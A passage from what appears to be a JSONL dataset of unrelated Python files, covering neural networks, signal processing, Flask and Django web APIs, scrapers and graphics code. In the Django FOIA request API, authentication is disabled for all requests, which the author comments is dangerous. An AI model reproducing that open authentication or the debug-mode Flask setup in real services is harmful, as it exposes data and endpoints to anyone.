img_as_ubyte(img_2)\r\ncv2.imwrite(\"h.png\",img_0)\r\ncv2.imwrite(\"s.png\",img_1)\r\ncv2.imwrite(\"v.png\",img_2)\r\n'''\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"dataset_dcm/data processing.py","file_name":"data processing.py","file_ext":"py","file_size_in_byte":3037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"246839165","text":"import torch as t\n\nclass Net(t.nn.Module):#why do I need to inherit the Module class?\n def __init__(self):\n super(Net, self).__init__()\n self.conv1 = t.nn.Conv3d(2, 64, kernel_size=3, stride=1, padding=1)\n self.conv1_bn = t.nn.BatchNorm3d(64)\n self.conv11 = t.nn.Conv3d(2, 64, kernel_size=1, stride=1)\n \n self.conv1b = t.nn.Conv3d(64, 64, kernel_size=3, stride=1, padding=1)\n self.conv1b_bn = t.nn.BatchNorm3d(64)\n self.conv1b1 = t.nn.Conv3d(64, 64, kernel_size=1, stride=1)\n \n self.conv1c = t.nn.Conv3d(64, 64, kernel_size=3, stride=1, padding=1)\n self.conv1c_bn = t.nn.BatchNorm3d(64)\n self.conv1c1 = t.nn.Conv3d(64, 64, kernel_size=1, stride=1)\n \n \n self.conv2 = t.nn.Conv3d(64, 128, kernel_size=3, stride=2, padding=1)\n self.conv2_bn = t.nn.BatchNorm3d(128)\n self.conv21 = t.nn.Conv3d(64, 128, kernel_size=1, stride=2)\n \n self.conv3 = t.nn.Conv3d(128, 256, kernel_size=3, stride=2, padding=1)\n self.conv3_bn = t.nn.BatchNorm3d(256)\n self.conv31 = t.nn.Conv3d(128, 256, kernel_size=1, stride=2)\n \n self.conv4 = t.nn.Conv3d(256, 512, kernel_size=3, stride=2, padding=1)\n self.conv4_bn = t.nn.BatchNorm3d(512)\n self.conv41 = t.nn.Conv3d(256, 512, kernel_size=1, stride=2)\n \n self.conv5 = t.nn.Conv3d(512, 1024, kernel_size=3, stride=2, padding=1)\n self.conv5_bn = t.nn.BatchNorm3d(1024)\n self.conv51 = t.nn.Conv3d(512, 1024, kernel_size=1, stride=2)\n \n self.aapool = t.nn.AdaptiveAvgPool3d((1, 1, 1))\n #self.fc1 = t.nn.Linear(512, 512)\n self.fc1 = t.nn.Linear(1024, 2)\n\n \n def forward(self, x):\n x = t.nn.functional.relu(self.conv1_bn(self.conv1(x)))\n #res = t.nn.functional.relu(self.conv11(x))\n #x = x1 + res\n \n x1 = t.nn.functional.relu(self.conv1b_bn(self.conv1b(x)))\n res = t.nn.functional.relu(self.conv1b1(x))\n x = x1 + res\n \n x1 = t.nn.functional.relu(self.conv1c_bn(self.conv1c(x)))\n res = t.nn.functional.relu(self.conv1c1(x))\n x = x1 + res\n \n x1 = t.nn.functional.relu(self.conv2_bn(self.conv2(x)))\n res = t.nn.functional.relu(self.conv21(x))\n x = x1 + res\n \n x1 = t.nn.functional.relu(self.conv3_bn(self.conv3(x)))\n res = t.nn.functional.relu(self.conv31(x))\n x = x1 + res\n \n x1 = t.nn.functional.relu(self.conv4_bn(self.conv4(x)))\n res = t.nn.functional.relu(self.conv41(x))\n x = x1 + res\n \n x1 = t.nn.functional.relu(self.conv5_bn(self.conv5(x)))\n res = t.nn.functional.relu(self.conv51(x))\n x = x1 + res\n\n x = self.aapool(x)\n\n x = x.squeeze(-1).squeeze(-1).squeeze(-1)\n\n #x = t.nn.functional.relu(self.fc1(x))\n x = self.fc1(x)\n x = t.nn.functional.log_softmax(x, dim=1)\n return x","sub_path":"headsal_net.py","file_name":"headsal_net.py","file_ext":"py","file_size_in_byte":2977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"130324723","text":"__author__ = 'cliviazhou'\n\nimport base\n\n\nclass UserInfo:\n def __init__(self, _username, _nickname, _bio, _upvote, _thanks,\n _followers, _followees, _views, _weibo, _location,\n _business, _career, _education, _collection, _share):\n\n self.user_url = base.Url.PEOPLE_URL + _username\n self.nickname = _nickname\n self.bio = _bio\n self.upvote = _upvote\n self.thanks = _thanks\n self.followers = _followers\n self.followees = _followees\n self.views = _views\n self.webo = _weibo\n self.location = _location\n self.business = _business\n self.career = _career\n self.education = _education\n self.collection = _collection\n self.share = _share\n","sub_path":"zhihu/spiders/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"507910516","text":"def substring_search(substring_list, data_string):\n\n search_data = []\n stack = []\n\n substring_list = [\n {\n \"value\": substring,\n \"length\": len(substring)\n } for substring in substring_list\n ]\n\n stop_char = \"\"\n char_list = list(data_string) + [stop_char]\n\n for position, char in enumerate(char_list):\n\n # processing\n for item in stack[:]:\n substring = substring_list[item[\"substring\"]]\n\n if not item[\"complete\"]:\n # match substring fully\n if item[\"span\"] == substring[\"length\"]:\n item[\"complete\"] = True\n else:\n # match substring\n if substring[\"value\"][item[\"span\"]] == char:\n item[\"span\"] += 1\n else:\n stack.remove(item)\n\n # extracting\n begin_limit = 0\n\n for item in stack[:]:\n # match begin not less then a limit\n if not item[\"begin\"] < begin_limit:\n # for complete match\n if item[\"complete\"]:\n substring = substring_list[item[\"substring\"]]\n search_data.append({\n \"position\": item[\"begin\"],\n \"substring\": substring[\"value\"]\n })\n\n begin_limit = item[\"begin\"] +item[\"span\"]\n else:\n break\n\n if item[\"begin\"] < begin_limit:\n stack.remove(item)\n\n # updating\n for index, substring in enumerate(substring_list):\n\n # match substring\n if char == substring[\"value\"][0]:\n stack.append({\n \"substring\": index,\n \"begin\": position,\n \"span\": 1,\n \"complete\": False\n })\n\n return search_data","sub_path":"libraries/substring_search_stack/substring_search.py","file_name":"substring_search.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"405195553","text":"from typing import Any\n\nfrom nekit_site.constants import routes\n\nfrom aiohttp import web\nimport gd\n\nclient = gd.server.CLIENT\nLEGACY_PASTEBIN = \"https://pastebin.com/raw/VXKF1KtN\"\n\n__all__ = (\"LEGACY_PASTEBIN\", \"check_level\")\n\n\nclass Singleton:\n instance = None\n\n def __new__(cls, *args, **kwargs) -> Any:\n if cls.instance is None:\n cls.instance = super().__new__(cls, *args, **kwargs)\n return cls.instance\n\n\nhandler = Singleton() # signleton uwu ~ nekit\nhandler.world_levels = ()\nhandler.map_packs = ()\nhandler.gauntlets = ()\nhandler.creators = ()\n\n\n@gd.tasks.loop(seconds=30)\nasync def loader() -> None:\n try:\n handler.world_levels = await client.search_levels(\n pages=range(100), filters=gd.Filters(strategy=\"world\")\n )\n handler.map_packs = await client.get_map_packs(pages=range(100))\n handler.gauntlets = await client.get_gauntlets()\n\n data = await client.http.normal_request(LEGACY_PASTEBIN)\n\n handler.creators = [name.lstrip(\"- \") for name in data.decode().split(\"\\r\\n\")]\n\n except Exception:\n pass # uwu\n\n\nloader.start()\n\n\n@routes.get(\"/legacy_project/{query}\")\n@gd.server.handle_errors(\n {\n ValueError: gd.server.Error(400, \"Invalid type in payload.\"),\n gd.MissingAccess: gd.server.Error(404, \"Requested level was not found.\"),\n }\n)\nasync def check_level(request: web.Request) -> web.Response:\n query = int(request.match_info.get(\"query\"))\n params = request.rel_url.query\n\n level = await client.get_level(query)\n\n checks = (\"reserved_ok\", \"world_or_packs_ok\", \"rate_status_ok\")\n analysis = []\n\n if not gd.server.str_to_bool(params.get(\"accept_reserved\", \"false\")):\n analysis.append(level.creator.name not in handler.creators)\n\n if not gd.server.str_to_bool(params.get(\"allow_world_or_packs\", \"false\")):\n check_against = {level.id for level in handler.world_levels}\n\n for map_pack in handler.map_packs:\n check_against.update(map_pack.level_ids)\n\n for gauntlet in handler.gauntlets:\n check_against.update(gauntlet.level_ids)\n\n analysis.append(level.id not in check_against)\n\n rate_map = {0: True, 1: level.is_rated(), 2: level.is_featured(), 3: level.is_epic()}\n\n analysis.append(rate_map.get(int(params.get(\"rate_status\", 2))))\n\n verified, detailed = all(analysis), dict(zip(checks, analysis))\n\n final = {\"approved\": verified, \"analysis\": detailed, \"data\": level}\n\n return gd.server.json_resp(final)\n","sub_path":"nekit_site/routes/legacy_project.py","file_name":"legacy_project.py","file_ext":"py","file_size_in_byte":2519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"391402986","text":"#!/bin/usr/python\n# Created by Jose \n# This file reads old-format DRM input files and translates them into new HDF5-based format.\n#\n\n# This file produces a rigid body input to the DRM layer. That is, all DRM nodes have same X-direction\n# displacement and acceleration. In this case a sine wave is used. This is not realistic, its\n# just for demonstration purposes. DRM won't work in this case but can be used to verify input if \n# a pseudo-static analysis is done (zero density on all elements and apply loads with transient\n# analysis.)\n\nimport scipy as sp\nimport h5py\nimport time\n\n#Write elements and nodes data\nelements = sp.loadtxt(\"DRMelements.txt\",dtype=sp.int32)\nexterior_nodes = sp.loadtxt(\"DRMexterior.txt\",dtype=sp.int32)\nboundary_nodes = sp.loadtxt(\"DRMbound.txt\",dtype=sp.int32)\n\nNe = sp.array(exterior_nodes.size)\nNb = sp.array(boundary_nodes.size)\n\nNt = Ne+Nb\n\nall_nodes = sp.hstack((boundary_nodes, exterior_nodes))\nis_boundary_node = sp.zeros(Nt, dtype=sp.int32)\nis_boundary_node[0:Nb] = 1\n\nh5file = h5py.File(\"input.hdf5\",\"w\")\n\nh5file.create_dataset(\"Elements\", data=elements)\nh5file.create_dataset(\"DRM Nodes\", data=all_nodes)\nh5file.create_dataset(\"Is Boundary Node\", data=is_boundary_node) #This array has 1 if the node at the corresponding position in \"DRM nodes\" array is a boundary node and zero if not\n\nh5file.create_dataset(\"Number of Exterior Nodes\", data=Ne)\nh5file.create_dataset(\"Number of Boundary Nodes\", data=Nb)\n\n#Write timestamp (time format used is that of c \"asctime\" Www Mmm dd hh:mm:ss yyyy example: Tue Jan 13 10:17:09 2009)\nlocaltime = time.asctime( time.localtime(time.time()) )\nh5file.create_dataset(\"Created\",data=str(localtime))\n\n#Generate motions\n\nt = sp.linspace(0,10,1001)\nw = 2*sp.pi/0.5\nd = sp.sin(w*t)\na = -w**2*sp.sin(w*t)\n\n#Output accelerations, displacements and time-vector\n\n#Format is:\n#\n# Accelerations has shape [3*(N_boundary_nodes + N_exterior_nodes) , Ntimesteps]\n#\n#\n# component A[3*n], A[3*n+1], A[3*n+2] correspond to acceleration in X, Y, and Z directions at node\n# n. The tag corresponding to node n that of the n-th component of array \"DRM Nodes\"\n\n#Time vector\n\nh5file.create_dataset(\"Time\", data=t)\n\nacc = h5file.create_dataset(\"Accelerations\", (3*Nt,len(t)), dtype=sp.double,chunks=(3,50))\ndis = h5file.create_dataset(\"Displacements\", (3*Nt,len(t)), dtype=sp.double,chunks=(3,50))\n\nfor node_index in range(Nt): \n\tacc[3*node_index,:] = a\n\tacc[3*node_index+1,:] = 0*a #Zero acceleration in y and z\n\tacc[3*node_index+2,:] = 0*a\n\tdis[3*node_index,:] = d\n\tdis[3*node_index+1,:] = 0*d #Zero displacement in y and z\n\tdis[3*node_index+2,:] = 0*d\n\n\n\nh5file.close()\n\n\n\n","sub_path":"document/Figure-files/generate_hdf5_drm_input.py","file_name":"generate_hdf5_drm_input.py","file_ext":"py","file_size_in_byte":2644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"546466649","text":"\"\"\"\nFind the png files and show them in a list recursively.\n\"\"\"\n\nimport os\n\ndef search_png(path):\n \"\"\"search for png files\"\"\"\n result = []\n for root, folders, files in os.walk(path):\n png_files = []\n for file in files:\n if file.lower().endswith('.png'):\n png_files.append(file)\n if png_files:\n result.append(root)\n result.append(png_files)\n for folder in folders:\n search_png(folder)\n return result\n\n\nif __name__ == '__main__':\n PNG_FOLDER = input(\"File path >: \")\n # PNG_FOLDER = os.path.join(os.getcwd(), 'data', 'furniture', 'chair')\n PNG_FILES = search_png(PNG_FOLDER)\n print(PNG_FILES)\n","sub_path":"students/MzKhan/lesson09/pngdiscover.py","file_name":"pngdiscover.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"305349248","text":"from flask import Flask, request, jsonify\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_cors import CORS\nfrom os import environ\n\napp = Flask(__name__)\n# app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+mysqlconnector://root:root@localhost:3306/cs301_team1_ascenda'\napp.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+mysqlconnector://USERNAME:PASSWORD@ascenda-loyalty.canszqrplode.us-east-1.rds.amazonaws.com/cs301_team1_ascenda'\n# app.config['SQLALCHEMY_DATABASE_URI'] = environ.get('dbURL')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n \ndb = SQLAlchemy(app)\nCORS(app)\n\nclass AscendaExchangeRate(db.Model):\n __tablename__ = 'ascenda_exchange_rate'\n \n bank_id = db.Column(db.VARCHAR(100), primary_key=True)\n loyalty_id = db.Column(db.VARCHAR(100), primary_key=True)\n base_exchange_amount = db.Column(db.VARCHAR(80), nullable=False)\n loyalty_exchange_amount = db.Column(db.VARCHAR(80), nullable=False)\n \n def __init__(self, bank_id, loyalty_id, base_exchange_amount, loyalty_exchange_amount):\n self.bank_id = bank_id\n self.loyalty_id = loyalty_id\n self.base_exchange_amount = base_exchange_amount\n self.loyalty_exchange_amount = loyalty_exchange_amount\n\n \n def json(self):\n return {\"bank_id\": self.bank_id, \"loyalty_id\": self.loyalty_id, \"base_exchange_amount\": self.base_exchange_amount, \"loyalty_exchange_amount\": self.loyalty_exchange_amount}\n\n# get all \n@app.route(\"/ascenda/exchange_rate\")\ndef get_all():\n # query for all exchange rate\n\treturn jsonify({\"exchange_rate\": [rate.json() for rate in AscendaExchangeRate.query.all()]})\n \n#get exchange rate with bank ID and partner ID\n@app.route(\"/exchange_rate//\")\ndef find_by_bankAndPartnerId(BankId, PartnerId):\n exchange_rate = AscendaExchangeRate.query.filter_by(bank_id=BankId, loyalty_id = PartnerId).all()\n if exchange_rate:\n return jsonify({\"exchange_rate\": [rate.json() for rate in AscendaExchangeRate.query.filter_by(bank_id=BankId, loyalty_id = PartnerId)]})\n return jsonify({\"message\": \"ExchangeRate not found.\"}), 404\n\n#get exchange rate with bank ID\n@app.route(\"/ascenda/exchange_rate/\")\ndef find_by_bankId(BankId):\n exchange_rate = AscendaExchangeRate.query.filter_by(bank_id=BankId).all()\n if exchange_rate:\n return jsonify({\"exchange_rate\": [rate.json() for rate in AscendaExchangeRate.query.filter_by(bank_id=BankId)]})\n return jsonify({\"message\": \"ExchangeRate not found.\"}), 404\n\n# Create \n@app.route(\"/ascenda/exchange_rate///\", methods=['POST'])\ndef create_exchange_rate(BankId, PartnerId):\n if (AscendaExchangeRate.query.filter_by(bank_id = BankId, loyalty_id = PartnerId).first()):\n return jsonify({\"message\": \"The exchange rate already exists.\"}), 400\n\n data = request.get_json()\n print (data)\n rate_detail = AscendaExchangeRate(BankId, PartnerId, **data)\n \n try:\n db.session.add(rate_detail)\n db.session.commit()\n except:\n return jsonify({\"message\": \"An error occurred creating the exchange rate.\"}), 500\n\n return jsonify(rate_detail.json()), 201\n\n@app.route(\"/ascenda/exchange_rate/update///\", methods=['POST'])\ndef update_rate(BankId, PartnerId):\n rate_detail = AscendaExchangeRate.query.filter_by(bank_id = BankId, loyalty_id = PartnerId).first()\n data = request.get_json()\n\n if \"base_exchange_amount\" in data:\n rate_detail.base_exchange_amount = data[\"base_exchange_amount\"]\n\n if \"loyalty_exchange_amount\" in data:\n rate_detail.loyalty_exchange_amount = data[\"loyalty_exchange_amount\"]\n \n try:\n db.session.commit()\n \n except:\n return jsonify({\"message\": \"An error occurred updating the exchange rate.\"}),500\n\n return jsonify(rate_detail.json()),201\n\n\nif __name__ == '__main__': # if it is the main program you run, then start flask\n # with docker\n # app.run(host='0.0.0.0', port=5000, debug=True)\n app.run(host='0.0.0.0', port=5003, debug=True) #to allow the file to be named other stuff apart from app.py\n # debug=True; shows the error and it will auto restart\n","sub_path":"exchange_rate/exchange_rate.py","file_name":"exchange_rate.py","file_ext":"py","file_size_in_byte":4179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"65361990","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n'''rename.py - adds a datestemp to all files that do not already have\none in '../data/local/downloads/'.\n'''\n\n# Libraries\nimport os\nimport errno\nimport argparse\nimport json\nfrom pprint import pprint\nimport re\nfrom datetime import datetime\n\n\ndef valid_filename(filename):\n '''valid_filename: determines if the given filename is a real file. Assumes that the file is in the current working directory for the program.\n\n returns: given file name\n '''\n if not os.path.isfile(filename):\n msg = \"The given file '{}' does not exist at '{}'.\".format(\n filename,\n os.getcwd()\n )\n raise argparse.ArgumentTypeError(msg)\n\n return filename\n\n\ndef parse_args():\n '''parse_args: parses command line arguments. Returns a dictionary of arguments.\n '''\n parser = argparse.ArgumentParser(\n description='Renames each file in the downloads directory to include the current YYYY-MM-DD datestamp at the end of the filename. For example: mydata.csv is converted to mydata-2018-11-21.csv.',\n prog='rename'\n )\n\n parser.add_argument('config_file',\n type=valid_filename,\n metavar='CONFIG_FILE',\n help=\"File path to requex configuration file. File must be in JSON format.\")\n\n return vars(parser.parse_args())\n\n\ndef get_config_filename(filename=None):\n '''get_config_filename: returns a verified Requex configuration file name. This function handles the ambiguity around whether the module was called from a shell with command line arguments or if called from another program using the run() function. If filename is none, the function assumes that there are\n\n return: string; valid filename.\n '''\n if filename is None:\n # get command line arguments\n args = parse_args()\n filename = args['config_file']\n else:\n if not os.path.isfile(filename):\n print(\"The given file '{}' does not exist at '{}'.\".format(\n filename,\n os.getcwd()\n ))\n exit(1)\n return filename\n\n\ndef get_config(filename):\n '''get_config: reads the configuration JSON file and stores values in a dictionary for processing.\n\n PRE: assumes the file already exists\n\n return: dict of configuration settings\n '''\n\n with open(filename, \"r\") as f:\n config = json.load(f)\n\n return config\n\n\ndef run(config_file=None):\n # get configuration parameters\n config_file = get_config_filename(config_file)\n config = get_config(config_file)\n # print('configuration settings:')\n # pprint(config)\n\n # filenames to exclude from renaming\n exclude = config['excluded_files']\n\n # use the downloads directory for all actions\n downloads_dir = config['root_dir']+config['downloads_dir']\n\n # retreive the current date (UTC)\n now = datetime.utcnow()\n date = now.strftime('%Y-%m-%d')\n\n # get a list of all files in the downloads directory\n files = [f for f in os.listdir(downloads_dir)\n if os.path.isfile(downloads_dir+f)]\n\n # update all file names that do not already have a datestemp to\n # include the current date.\n for file in files:\n filename, extension = os.path.splitext(file)\n\n if filename in exclude:\n continue\n\n # check for a datestamp in the filename\n found_date = re.search(r'\\d\\d\\d\\d-\\d\\d-\\d\\d|$', filename).group()\n if found_date == '':\n # no datestamp, append one\n os.rename(downloads_dir+file, downloads_dir+filename+'-'+date+extension)\n\n\nif __name__ == '__main__':\n run()\n","sub_path":"code/pipeline/rename.py","file_name":"rename.py","file_ext":"py","file_size_in_byte":3677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"531804218","text":"import numpy as np\nimport matplotlib.mlab as mlab\n\nclass STFT:\n def __init__(self, default_fs=44100, default_window_size=4096,\n default_overlap_ratio=0.5):\n ######################################################################\n # Sampling rate, related to the Nyquist conditions, which affects\n # the range frequencies we can detect.\n self.DEFAULT_FS = default_fs\n\n ######################################################################\n # Size of the FFT window, affects frequency granularity\n self.DEFAULT_WINDOW_SIZE = default_window_size\n\n ######################################################################\n # Ratio by which each sequential window overlaps the last and the\n # next window. Higher overlap will allow a higher granularity of offset\n # matching, but potentially more fingerprints.\n self.DEFAULT_OVERLAP_RATIO = default_overlap_ratio\n\n def get_2D_spectrum(self, channel_samples):\n \"\"\"\n FFT the channel, log transform output\n \"\"\"\n # FFT the signal and extract frequency components\n arr2D = mlab.specgram(\n channel_samples,\n NFFT=self.DEFAULT_WINDOW_SIZE,\n Fs=self.DEFAULT_FS,\n window=mlab.window_hanning,\n noverlap=int(self.DEFAULT_WINDOW_SIZE * self.DEFAULT_OVERLAP_RATIO))[0]\n\n # apply log transform since specgram() returns linear array\n arr2D = 10 * np.log10(arr2D)\n arr2D[arr2D == -np.inf] = 0 # replace infs with zeros\n return arr2D","sub_path":"tools/STFT.py","file_name":"STFT.py","file_ext":"py","file_size_in_byte":1584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"320597239","text":"import datetime\n\nfrom django.db import transaction\n\nfrom restless.dj import DjangoResource\nfrom restless.preparers import FieldsPreparer\n\nfrom foia_hub.models import *\n\n\nclass AgencyResource(DjangoResource):\n\n preparer = FieldsPreparer(fields={\n 'id': 'id',\n 'name': 'name',\n 'abbreviation': 'abbreviation',\n 'description': 'description',\n 'slug': 'slug',\n })\n\n # GET /\n def list(self):\n return Agency.objects.all()\n\n\nclass OfficeResource(DjangoResource):\n\n preparer = FieldsPreparer(fields={\n 'id': 'id',\n 'name': 'name',\n 'slug': 'slug',\n\n 'service_center': 'service_center',\n 'fax': 'fax',\n\n 'request_form': 'request_form',\n 'website': 'website',\n 'emails': 'emails',\n\n 'contact': 'contact',\n 'contact_phone': 'contact_phone',\n 'public_liaison': 'public_liaison',\n\n 'notes': 'notes',\n })\n\n # GET /\n def list(self, slug):\n return Office.objects.filter(agency__slug=slug)\n\n\nclass FOIARequestResource(DjangoResource):\n\n preparer = FieldsPreparer(fields={\n 'status': 'status',\n 'requester': 'requester.pk',\n 'date_start': 'date_start',\n 'date_end': 'date_end',\n 'fee_limit': 'fee_limit',\n 'request_body': 'request_body',\n 'custom_fields': 'custom_fields',\n 'tracking_id': 'pk',\n })\n\n def _convert_date(self, date):\n return datetime.datetime.strptime(date, '%B %d, %Y')\n\n # POST /\n def create(self):\n\n foia = None\n with transaction.atomic():\n\n office = Office.objects.get(\n agency__slug=self.data['agency'],\n slug=self.data['office'],\n )\n\n requester = Requester.objects.create(\n first_name=self.data['first_name'],\n last_name=self.data['last_name'],\n email=self.data['email']\n )\n\n start = self._convert_date(self.data['documents_start'])\n end = self._convert_date(self.data['documents_end'])\n\n foia = FOIARequest.objects.create(\n status='O',\n requester=requester,\n office=office,\n date_start=start,\n date_end=end,\n request_body=self.data['body'],\n custom_fields=self.data['agency_fields'],\n )\n\n return foia\n\n # GET /\n def list(self):\n return FOIARequest.objects.all()\n\n # Open everything wide!\n # DANGEROUS, DO NOT DO IN PRODUCTION.\n # more info here:\n # https://github.com/toastdriven/restless/blob/master/docs/tutorial.rst\n def is_authenticated(self):\n return True\n","sub_path":"foia_hub/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"222395151","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom os.path import basename\nimport numpy as np\nfrom utils.progressbar import wrap_iterator\n\n\ndef stack_frame(input_list, input_paths, frame_num_dict, num_stack, num_skip,\n progressbar=False):\n \"\"\"Stack & skip some frames. This implementation is based on\n https://arxiv.org/abs/1507.06947.\n Sak, Haşim, et al.\n \"Fast and accurate recurrent neural network acoustic models for speech recognition.\"\n arXiv preprint arXiv:1507.06947 (2015).\n Args:\n input_list (list): list of input data\n input_paths (list): paths to input data. This is used to get the\n number of frames from frame_num_dict.\n frame_num_dict (dict):\n key (string) => utterance index\n value (int) => the number of frames\n num_stack (int): the number of frames to stack\n num_skip (int): the number of frames to skip\n progressbar (bool, optional): if True, visualize progressbar\n Returns:\n stacked_input_list (list): list of frame-stacked inputs\n \"\"\"\n if num_stack == 1 and num_stack == 1:\n return input_list\n\n if num_stack < num_skip:\n raise ValueError('num_skip must be less than num_stack.')\n\n input_size = input_list[0].shape[1]\n utt_num = len(input_paths)\n\n stacked_input_list = []\n for i_utt in wrap_iterator(range(utt_num), progressbar):\n # Per utterance\n input_name = basename(input_paths[i_utt]).split('.')[0]\n frame_num = frame_num_dict[input_name]\n frame_num_decimated = frame_num / num_skip\n if frame_num_decimated != int(frame_num_decimated):\n frame_num_decimated += 1\n frame_num_decimated = int(frame_num_decimated)\n\n stacked_frames = np.zeros(\n (frame_num_decimated, input_size * num_stack))\n stack_count = 0 # counter for stacked_frames\n stack = []\n for i_frame, frame in enumerate(input_list[i_utt]):\n #####################\n # final frame\n #####################\n if i_frame == len(input_list[i_utt]) - 1:\n # Stack the final frame\n stack.append(frame)\n\n while stack_count != int(frame_num_decimated):\n # Concatenate stacked frames\n for i_stack in range(len(stack)):\n stacked_frames[stack_count][input_size *\n i_stack:input_size * (i_stack + 1)] = stack[i_stack]\n stack_count += 1\n\n # Delete some frames to skip\n for _ in range(num_skip):\n if len(stack) != 0:\n stack.pop(0)\n\n ########################\n # first & middle frames\n ########################\n elif len(stack) < num_stack:\n # Stack some frames until stack is filled\n stack.append(frame)\n\n if len(stack) == num_stack:\n # Concatenate stacked frames\n for i_stack in range(num_stack):\n stacked_frames[stack_count][input_size *\n i_stack:input_size * (i_stack + 1)] = stack[i_stack]\n stack_count += 1\n\n # Delete some frames to skip\n for _ in range(num_skip):\n stack.pop(0)\n\n stacked_input_list.append(stacked_frames)\n\n return np.array(stacked_input_list)\n","sub_path":"utils/io/inputs/frame_stacking.py","file_name":"frame_stacking.py","file_ext":"py","file_size_in_byte":3710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"377981131","text":"#! python3\n# downloadXkcd.py - Downloads comic with cron - schedule tool\n\nimport requests\nimport os\nimport bs4\n\nurl = 'http://www.lefthandedtoons.com'\nprint('Downloading page %s...' % url)\nres = requests.get(url)\nres.raise_for_status()\n\nsoup = bs4.BeautifulSoup(res.text, features='html.parser')\n\n# Find the URL of the comic image.\ncomicElem = soup.select('.comicimage')\nif not comicElem:\n print('Could not find comic image.')\nelse:\n comicURL = comicElem[0].get('src')\n # Download the image.\n print('Downloading image %s...' % comicURL)\n res = requests.get(comicURL)\n res.raise_for_status()\n\n # Save the image to ./xkcd.\n imageFile = open(os.path.join('/home/bart/Desktop', os.path.basename(comicURL)), 'wb')\n for chunk in res.iter_content(100000):\n imageFile.write(chunk)\n imageFile.close()\n\n\nprint('Done.')\n","sub_path":"Scheduled Web Comic Downloader/downloader.py","file_name":"downloader.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"569168213","text":"#!/usr/bin/python\nimport os, sys\n\nactivate_this = '/srv/teleskype_web/virtualenv/bin/activate_this.py'\nwith open(activate_this) as f:\n code = compile(f.read(), activate_this, 'exec')\n exec(code, dict(__file__=activate_this))\n\nsys.path.append('/srv/teleskype_web/')\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"teleskype_web.settings\")\n\nfrom django.core.wsgi import get_wsgi_application\napplication = get_wsgi_application()\n","sub_path":"example_wsgi.py","file_name":"example_wsgi.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"63777304","text":"import pyglet.gl as gl\nimport numpy as np\nimport numpy.matlib\nimport matplotlib.colors as mcol\nimport pyglet\nimport time\nimport pandas as pd\n\n# O: Object e.g. vtsO: vertexes in Object Coordinate System\n# W: World e.g. vtsW: vertexes in World Coordinate System\ngravity = 9.81\nw = 1080 # Screen width\nh = 720 # Screen height\nlw = 2.0 # Line width\n\nconfig = gl.Config(sample_buffers=1, samples=8) # Anti-aliasing\nwindow = pyglet.window.Window(w, h, config=config)\n\n# Angle to rotation matrix\ndef rad2rm(theta):\n s = np.sin(theta)\n c = np.cos(theta)\n return np.mat([[c, -s], [s, c]])\n\n# Value remap\ndef remap(x, old_min, old_max, new_min=0., new_max=1.):\n old_mean = .5*(old_max+old_min)\n old_range = old_max - old_min\n new_mean = .5*(new_max+new_min)\n new_range = new_max - new_min\n y = (x-old_mean)*new_range/old_range + new_mean\n return y\n\n\nclass Camera:\n def __init__(self, scale=200.0, theta=0.0, x=0.0, y=0.0):\n self.scale = scale # Zoom factor: Pixels Per Meter\n self.theta = theta # Camera roll angle\n self.trans = np.mat([x, y]).T # Camera position\n self.rotmat = rad2rm(theta) # Rotation matrix\n self.offset = np.mat([w / 2, h / 2]).T # Camera offset\n\n def setPosition(self, x, y):\n self.trans[0, 0] = x\n self.trans[1, 0] = y\n\n def setX(self, x):\n self.trans[0, 0] = x\n\n def setY(self, y):\n self.trans[1, 0] = y\n\n def getX(self):\n return self.trans[0, 0]\n\n def getY(self):\n return self.trans[1, 0]\n\n def setDirectionDeg(self, theta):\n self.theta = np.deg2rad(theta)\n self.rotmat = rad2rm(self.theta)\n\n def setDirectionRad(self, theta):\n self.theta = theta\n self.rotmat = rad2rm(theta)\n\n def project(self, vts):\n return self.rotmat.T * vts * self.scale - self.trans * self.scale + self.offset\n\n\nclass Element:\n def __init__(self, num_vts=1, x=0.0, y=0.0, camera=None):\n self.num_vts = num_vts # Vertexes number\n self.vtsO = np.matlib.zeros((2, num_vts)) # Vertexes represented in Object Coordinate System\n self.pivotO = np.matlib.zeros((2, 1)) # Center of rotation represented in Object Coordinate System\n self.vtsW = np.matlib.zeros((2, num_vts)) # Vertexes represented in World Coordinate System\n self.translation = np.mat([[x], [y]]) # Offset in World 